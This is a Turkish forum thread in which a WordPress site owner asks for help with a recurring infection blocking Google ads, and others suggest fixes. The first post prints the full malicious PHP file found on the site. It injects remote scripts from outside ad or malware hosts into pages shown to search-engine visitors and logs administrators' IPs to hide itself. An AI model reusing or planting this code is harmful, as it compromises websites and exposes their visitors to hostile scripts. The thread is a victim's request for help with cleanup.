• 25-11-2017, 23:00:36
    #1
    Merhaba arkadaşlar gün boyunca araştırdığım tüm yolları denediğim fakat sonuç alamadığım bir problem var google adwords bu zararlı yazılımdan dolayı reklamı onaylamıyor. Ftp dizininde otomatik olarak bu kod oluşmakta.

    /public_html/wp-includes/wp-tmp.php

    İçeriği

    ini_set('display_errors', 0);
    error_reporting(0);
    $anx='e810cc8873fd72ff6d1585ebccddae8e';
    if ( ! function_exists( 'slider_option' ) ) {


    function slider_option($content){
    if(is_single())
    {




    $con = '
    ';

    $con2 = '

    <script type="text/javascript" src="//go.oclaserver.com/apu.php?zoneid=1476266"></script>

    <script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1476269&interactive=1&pushup=1"></script>

    ';

    $content=$content.$con2;
    }
    return $content;
    }

    function slider_option_footer(){
    if(!is_single())
    {




    $con2 = '

    <script type="text/javascript" src="//go.oclaserver.com/apu.php?zoneid=1476266"></script>

    <script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1476269&interactive=1&pushup=1"></script>

    ';

    echo $con2;
    }
    }








    function setting_my_first_cookie() {
    setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
    }


    if(is_user_logged_in())
    {
    add_action( 'init', 'setting_my_first_cookie',1 );
    }







    if( current_user_can('edit_others_pages'))
    {

    if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
    {
    $ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
    }

    if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
    {
    $ip.=$_SERVER['REMOTE_ADDR'].'
    ';
    @file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);


    }



    }






    $ref = $_SERVER['HTTP_REFERER'];
    $SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.' ,'doubleclick.net','googleweblight.com');
    foreach ($SE as $source) {
    if (strpos($ref,$source)!==false) {
    setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);
    $sevisitor=true;
    }
    }






    if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in())
    {
    $adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
    if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
    {
    if($sevisitor==true || isset($_COOKIE['sevisitor']))
    {
    add_filter('the_content','slider_option');
    add_action('wp_footer','slider_option_footer');
    }

    }

    }





    }
  • 25-11-2017, 23:07:45
    #2
    Kimlik doğrulama veya yönetimden onay bekliyor.
    Wp den pek anlamam ama iki şey gözüme çarptı . Oclaserver adresinden js geliyor ordan sorun olabilir mi bir de $anx='e810cc8873fd72ff6d1585ebccddae8e bu değişken neyi temsil ediyor
  • 25-11-2017, 23:22:35
    #3
    etapsoft adlı üyeden alıntı: mesajı görüntüle
    Wp den pek anlamam ama iki şey gözüme çarptı . Oclaserver adresinden js geliyor ordan sorun olabilir mi bir de $anx='e810cc8873fd72ff6d1585ebccddae8e bu değişken neyi temsil ediyor
    Hocam normalde wordpress'te bu alan yok siliyorum tekrar virüs yayılıyor. "go.mobisla.com" bu konu hakkında ücretli destek aldım az önce ücret ödemedim temizledikten sonra sebeblerinide yazdıktan sonra ödeme alacak.
  • 25-11-2017, 23:31:12
    #4
    Bana pek mantıklı gelmedi. İkinci parti bir kod çekerek neyi düzelecek ki ilginç . Bence uğraşmayın upload vs yedekerinizi alın wp dosyalarını yeniden yükleyin. Güncelleme işlemi de size yardimci olabilir .
  • 25-11-2017, 23:36:09
    #5
    etapsoft adlı üyeden alıntı: mesajı görüntüle
    Bana pek mantıklı gelmedi. İkinci parti bir kod çekerek neyi düzelecek ki ilginç . Bence uğraşmayın upload vs yedekerinizi alın wp dosyalarını yeniden yükleyin. Güncelleme işlemi de size yardimci olabilir .
    Hocam her türlü yolu denedim yedekleme aldım günceleldim didik didik taradım zarralı kodları buldum sildim ama yine türedi. Başka Çarem kalmadı. Yarın sonuçların dedi ilgilenen arkadaş.
  • 01-12-2017, 12:35:04
    #6
    Misafir adlı üyeden alıntı: mesajı görüntüle
    Hocam her türlü yolu denedim yedekleme aldım günceleldim didik didik taradım zarralı kodları buldum sildim ama yine türedi. Başka Çarem kalmadı. Yarın sonuçların dedi ilgilenen arkadaş.
    Merhaba hocam acaba sorununa çözüm bulabildin mi?
  • 01-12-2017, 20:08:29
    #7
    saidalt adlı üyeden alıntı: mesajı görüntüle
    Merhaba hocam acaba sorununa çözüm bulabildin mi?
    Merhaba Hocam evet eklentilere ve temaya bulaşan bir yaızlım temizlendi. İşlemi ücret karşılında birine yaptırdım ben çok uğraştım sonuca varamadım ama ilgilenen arkadaş hemen halleti.